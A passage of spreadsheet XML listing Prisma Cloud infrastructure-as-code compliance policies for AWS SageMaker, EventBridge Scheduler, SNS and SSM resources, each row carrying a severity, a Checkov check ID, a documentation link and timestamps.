      <c r="Q842" t="inlineStr"/>
      <c r="R842" t="inlineStr"/>
      <c r="S842" t="inlineStr"/>
      <c r="T842" t="b">
        <v>0</v>
      </c>
      <c r="U842" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V842" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-data-quality-job-definition</t>
        </is>
      </c>
      <c r="W842" t="inlineStr">
        <is>
          <t>Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts</t>
        </is>
      </c>
      <c r="X842" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-367</t>
        </is>
      </c>
      <c r="Y842" t="inlineStr"/>
      <c r="Z842" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_data_quality_job_definition"]}</t>
        </is>
      </c>
      <c r="AA842" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB842" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC842" t="inlineStr">
        <is>
          <t>CKV_AWS_367</t>
        </is>
      </c>
      <c r="AD842" t="b">
        <v>1</v>
      </c>
      <c r="AE842" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF842" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>9ce055f8-7939-4888-9bb7-544605c0a87a</t>
        </is>
      </c>
      <c r="AI842" t="inlineStr"/>
      <c r="AJ842" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK842" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" t="inlineStr"/>
      <c r="B843" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C843" s="2" t="inlineStr"/>
      <c r="D843" t="inlineStr"/>
      <c r="E843" t="inlineStr"/>
      <c r="F843" t="inlineStr"/>
      <c r="G843" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J843" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K843" t="inlineStr">
        <is>
          <t>AWS Sagemaker data quality job not encrypting communications between instances used for monitoring jobs</t>
        </is>
      </c>
      <c r="L843" t="inlineStr"/>
      <c r="M843" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N843" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O843" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P843" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q843" t="inlineStr"/>
      <c r="R843" t="inlineStr"/>
      <c r="S843" t="inlineStr"/>
      <c r="T843" t="b">
        <v>0</v>
      </c>
      <c r="U843" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V843" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-data-quality-job-definition</t>
        </is>
      </c>
      <c r="W843" t="inlineStr">
        <is>
          <t>Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs</t>
        </is>
      </c>
      <c r="X843" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-369</t>
        </is>
      </c>
      <c r="Y843" t="inlineStr"/>
      <c r="Z843" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_data_quality_job_definition"]}</t>
        </is>
      </c>
      <c r="AA843" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB843" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC843" t="inlineStr">
        <is>
          <t>CKV_AWS_369</t>
        </is>
      </c>
      <c r="AD843" t="b">
        <v>1</v>
      </c>
      <c r="AE843" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF843" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>404594b6-5d5e-4fab-a439-f6615572aed4</t>
        </is>
      </c>
      <c r="AI843" t="inlineStr"/>
      <c r="AJ843" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK843" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" t="inlineStr"/>
      <c r="B844" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C844" s="2" t="inlineStr"/>
      <c r="D844" t="inlineStr"/>
      <c r="E844" t="inlineStr"/>
      <c r="F844" t="inlineStr"/>
      <c r="G844" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J844" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K844" t="inlineStr">
        <is>
          <t>AWS Sagemaker domain not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L844" t="inlineStr"/>
      <c r="M844" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N844" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O844" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P844" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q844" t="inlineStr"/>
      <c r="R844" t="inlineStr"/>
      <c r="S844" t="inlineStr"/>
      <c r="T844" t="b">
        <v>0</v>
      </c>
      <c r="U844" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V844" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-domain</t>
        </is>
      </c>
      <c r="W844" t="inlineStr">
        <is>
          <t>Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X844" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107</t>
        </is>
      </c>
      <c r="Y844" t="inlineStr"/>
      <c r="Z844" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_domain"]}</t>
        </is>
      </c>
      <c r="AA844" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB844" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC844" t="inlineStr">
        <is>
          <t>CKV_AWS_187</t>
        </is>
      </c>
      <c r="AD844" t="b">
        <v>1</v>
      </c>
      <c r="AE844" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF844" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>1414b690-a442-4a9c-9f59-91a507b42228</t>
        </is>
      </c>
      <c r="AI844" t="inlineStr"/>
      <c r="AJ844" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK844" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" t="inlineStr"/>
      <c r="B845" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C845" s="2" t="inlineStr"/>
      <c r="D845" t="inlineStr"/>
      <c r="E845" t="inlineStr"/>
      <c r="F845" t="inlineStr"/>
      <c r="G845" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J845" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K845" t="inlineStr">
        <is>
          <t>AWS SageMaker Flow Definition does not use KMS for output configurations</t>
        </is>
      </c>
      <c r="L845" t="inlineStr"/>
      <c r="M845" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N845" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O845" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P845" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q845" t="inlineStr"/>
      <c r="R845" t="inlineStr"/>
      <c r="S845" t="inlineStr"/>
      <c r="T845" t="b">
        <v>0</v>
      </c>
      <c r="U845" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V845" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-flow-definition</t>
        </is>
      </c>
      <c r="W845" t="inlineStr">
        <is>
          <t>Ensure Amazon SageMaker Flow Definition uses KMS for output configurations</t>
        </is>
      </c>
      <c r="X845" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-372</t>
        </is>
      </c>
      <c r="Y845" t="inlineStr"/>
      <c r="Z845" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_flow_definition"]}</t>
        </is>
      </c>
      <c r="AA845" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB845" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC845" t="inlineStr">
        <is>
          <t>CKV_AWS_372</t>
        </is>
      </c>
      <c r="AD845" t="b">
        <v>1</v>
      </c>
      <c r="AE845" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF845" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>4092b020-4b1e-465d-a1ad-f38d8e88dfb3</t>
        </is>
      </c>
      <c r="AI845" t="inlineStr"/>
      <c r="AJ845" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK845" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" t="inlineStr"/>
      <c r="B846" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C846" s="2" t="inlineStr"/>
      <c r="D846" t="inlineStr"/>
      <c r="E846" t="inlineStr"/>
      <c r="F846" t="inlineStr"/>
      <c r="G846" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J846" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker</t>
        </is>
      </c>
      <c r="K846" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance allows for IMDSv1</t>
        </is>
      </c>
      <c r="L846" t="inlineStr"/>
      <c r="M846" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N846" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O846" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P846" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q846" t="inlineStr"/>
      <c r="R846" t="inlineStr"/>
      <c r="S846" t="inlineStr"/>
      <c r="T846" t="b">
        <v>0</v>
      </c>
      <c r="U846" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V846" t="inlineStr">
        <is>
          <t>IaC:General:aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W846" t="inlineStr">
        <is>
          <t>Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2</t>
        </is>
      </c>
      <c r="X846" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-371</t>
        </is>
      </c>
      <c r="Y846" t="inlineStr"/>
      <c r="Z846" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA846" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB846" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC846" t="inlineStr">
        <is>
          <t>CKV_AWS_371</t>
        </is>
      </c>
      <c r="AD846" t="b">
        <v>1</v>
      </c>
      <c r="AE846" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF846" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>b74937ca-e6e5-463e-ac83-9476a90cac40</t>
        </is>
      </c>
      <c r="AI846" t="inlineStr"/>
      <c r="AJ846" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK846" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" t="inlineStr"/>
      <c r="B847" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C847" s="2" t="inlineStr"/>
      <c r="D847" t="inlineStr"/>
      <c r="E847" t="inlineStr"/>
      <c r="F847" t="inlineStr"/>
      <c r="G847" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J847" t="inlineStr">
        <is>
          <t>IaC:General:aws-scheduler</t>
        </is>
      </c>
      <c r="K847" t="inlineStr">
        <is>
          <t>EventBridge Scheduler Schedule is not using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L847" t="inlineStr"/>
      <c r="M847" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N847" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O847" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P847" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q847" t="inlineStr"/>
      <c r="R847" t="inlineStr"/>
      <c r="S847" t="inlineStr"/>
      <c r="T847" t="b">
        <v>0</v>
      </c>
      <c r="U847" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V847" t="inlineStr">
        <is>
          <t>IaC:General:aws-scheduler-schedule</t>
        </is>
      </c>
      <c r="W847" t="inlineStr">
        <is>
          <t>Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X847" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-297</t>
        </is>
      </c>
      <c r="Y847" t="inlineStr"/>
      <c r="Z847" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_scheduler_schedule"]}</t>
        </is>
      </c>
      <c r="AA847" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB847" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC847" t="inlineStr">
        <is>
          <t>CKV_AWS_297</t>
        </is>
      </c>
      <c r="AD847" t="b">
        <v>1</v>
      </c>
      <c r="AE847" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF847" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>0a9ecb7e-7cb0-42d5-afa6-8917ad6bdc86</t>
        </is>
      </c>
      <c r="AI847" t="inlineStr"/>
      <c r="AJ847" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK847" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" t="inlineStr"/>
      <c r="B848" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C848" s="2" t="inlineStr"/>
      <c r="D848" t="inlineStr"/>
      <c r="E848" t="inlineStr"/>
      <c r="F848" t="inlineStr"/>
      <c r="G848" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J848" t="inlineStr">
        <is>
          <t>IaC:General:aws-sns</t>
        </is>
      </c>
      <c r="K848" t="inlineStr">
        <is>
          <t>AWS SNS topic has SSE disabled</t>
        </is>
      </c>
      <c r="L848" t="inlineStr"/>
      <c r="M848" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N848" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O848" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P848" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q848" t="inlineStr"/>
      <c r="R848" t="inlineStr"/>
      <c r="S848" t="inlineStr"/>
      <c r="T848" t="b">
        <v>0</v>
      </c>
      <c r="U848" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V848" t="inlineStr">
        <is>
          <t>IaC:General:aws-sns-topic</t>
        </is>
      </c>
      <c r="W848" t="inlineStr">
        <is>
          <t>Ensure all data stored in the SNS topic is encrypted</t>
        </is>
      </c>
      <c r="X848" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-15</t>
        </is>
      </c>
      <c r="Y848" t="inlineStr"/>
      <c r="Z848" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_sns_topic"]}</t>
        </is>
      </c>
      <c r="AA848" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB848" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC848" t="inlineStr">
        <is>
          <t>CKV_AWS_26</t>
        </is>
      </c>
      <c r="AD848" t="b">
        <v>1</v>
      </c>
      <c r="AE848" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF848" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>ad9c283b-1205-42f1-a2be-1179921a24f9</t>
        </is>
      </c>
      <c r="AI848" t="inlineStr"/>
      <c r="AJ848" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK848" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" t="inlineStr"/>
      <c r="B849" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C849" s="2" t="inlineStr"/>
      <c r="D849" t="inlineStr"/>
      <c r="E849" t="inlineStr"/>
      <c r="F849" t="inlineStr"/>
      <c r="G849" t="b">
        <v>1</v>
      </c>
      <c r="H8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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J849" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm</t>
        </is>
      </c>
      <c r="K849" t="inlineStr">
        <is>
          <t>Session Manager data is not encrypted in transit</t>
        </is>
      </c>
      <c r="L849" t="inlineStr"/>
      <c r="M849" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N849" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O849" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P849" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q849" t="inlineStr"/>
      <c r="R849" t="inlineStr"/>
      <c r="S849" t="inlineStr"/>
      <c r="T849" t="b">
        <v>0</v>
      </c>
      <c r="U849" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V849" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm-document</t>
        </is>
      </c>
      <c r="W849" t="inlineStr">
        <is>
          <t>Ensure Session Manager data is encrypted in transit</t>
        </is>
      </c>
      <c r="X849" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit</t>
        </is>
      </c>
      <c r="Y849" t="inlineStr"/>
      <c r="Z849" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ssm_document"]}</t>
        </is>
      </c>
      <c r="AA849" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB849" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC849" t="inlineStr">
        <is>
          <t>CKV_AWS_112</t>
        </is>
      </c>
      <c r="AD849" t="b">
        <v>1</v>
      </c>
      <c r="AE849" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF849" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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49" t="inlineStr">
        <is>
          <t>8656de0e-831d-4bf3-8d08-d6a79330fd3a</t>
        </is>
      </c>
      <c r="AI849" t="inlineStr"/>
      <c r="AJ849" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK849" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" t="inlineStr"/>
      <c r="B850" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C850" s="2" t="inlineStr"/>
      <c r="D850" t="inlineStr"/>
      <c r="E850" t="inlineStr"/>
      <c r="F850" t="inlineStr"/>
      <c r="G850" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J850" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm</t>
        </is>
      </c>
      <c r="K850" t="inlineStr">
        <is>
          <t>Deletion protection disabled for load balancer</t>
        </is>
      </c>
      <c r="L850" t="inlineStr"/>
      <c r="M850" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N850" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O850" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P850" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q850" t="inlineStr"/>
      <c r="R850" t="inlineStr"/>
      <c r="S850" t="inlineStr"/>
      <c r="T850" t="b">
        <v>0</v>
      </c>
      <c r="U850" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V850" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm-document</t>
        </is>
      </c>
      <c r="W850" t="inlineStr">
        <is>
          <t>Ensure Session Manager logs are enabled and encrypted</t>
        </is>
      </c>
      <c r="X850" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-networking-62</t>
        </is>
      </c>
      <c r="Y850" t="inlineStr"/>
      <c r="Z850" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ssm_document"]}</t>
        </is>
      </c>
      <c r="AA850" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB850" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC850" t="inlineStr">
        <is>
          <t>CKV_AWS_113</t>
        </is>
      </c>
      <c r="AD850" t="b">
        <v>1</v>
      </c>
      <c r="AE850" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF850" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>9be5d82a-e667-49a5-bb21-c36ebec22f66</t>
        </is>
      </c>
      <c r="AI850" t="inlineStr"/>
      <c r="AJ850" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK850" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" t="inlineStr"/>
      <c r="B851" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C851" s="2" t="inlineStr"/>
      <c r="D851" t="inlineStr"/>
      <c r="E851" t="inlineStr"/>
      <c r="F851" t="inlineStr"/>
      <c r="G851" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J851" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm</t>
        </is>
      </c>
      <c r="K851" t="inlineStr">
        <is>
          <t>AWS Terraform sends SSM secrets to untrusted domains over HTTP</t>
        </is>
      </c>
      <c r="L851" t="inlineStr"/>
      <c r="M851" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N851" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O851" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P851" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q851" t="inlineStr"/>
      <c r="R851" t="inlineStr"/>
      <c r="S851" t="inlineStr"/>
      <c r="T851" t="b">
        <v>0</v>
      </c>
      <c r="U851" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V851" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm-parameter</t>
        </is>
      </c>
      <c r="W851" t="inlineStr">
        <is>
          <t>Ensure terraform is not sending SSM secrets to untrusted domains over HTTP</t>
        </is>
      </c>
      <c r="X851" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http</t>
        </is>
      </c>
      <c r="Y851" t="inlineStr"/>
      <c r="Z851" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ssm_parameter"]}</t>
        </is>
      </c>
      <c r="AA851" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB851" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC851" t="inlineStr">
        <is>
          <t>CKV2_AWS_36</t>
        </is>
      </c>
      <c r="AD851" t="b">
        <v>1</v>
      </c>
      <c r="AE851" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF851" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>97cd3044-4e7e-40b2-9240-4410d7932d79</t>
        </is>
      </c>
      <c r="AI851" t="inlineStr"/>
      <c r="AJ851" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK851" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" t="inlineStr"/>
      <c r="B852" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C852" s="2" t="inlineStr"/>
      <c r="D852" t="inlineStr"/>
      <c r="E852" t="inlineStr"/>
      <c r="F852" t="inlineStr"/>
      <c r="G852" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J852" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm</t>
        </is>
      </c>
      <c r="K852" t="inlineStr">
        <is>
          <t>SSM parameters are not utilizing KMS CMK.</t>
        </is>
      </c>
      <c r="L852" t="inlineStr"/>
      <c r="M852" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N852" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O852" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P852" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q852" t="inlineStr"/>
      <c r="R852" t="inlineStr"/>
      <c r="S852" t="inlineStr"/>
      <c r="T852" t="b">
        <v>0</v>
      </c>
      <c r="U852" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V852" t="inlineStr">
        <is>
          <t>IaC:General:aws-ssm-parameter</t>
        </is>
      </c>
      <c r="W852" t="inlineStr">
        <is>
          <t>Ensure SSM parameters are using KMS CMK</t>
        </is>
      </c>
      <c r="X852" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-337</t>
        </is>
      </c>
      <c r="Y852" t="inlineStr"/>
      <c r="Z852" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ssm_parameter"]}</t>
        </is>
      </c>
      <c r="AA852" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB852" t="inlineStr">
        <is>
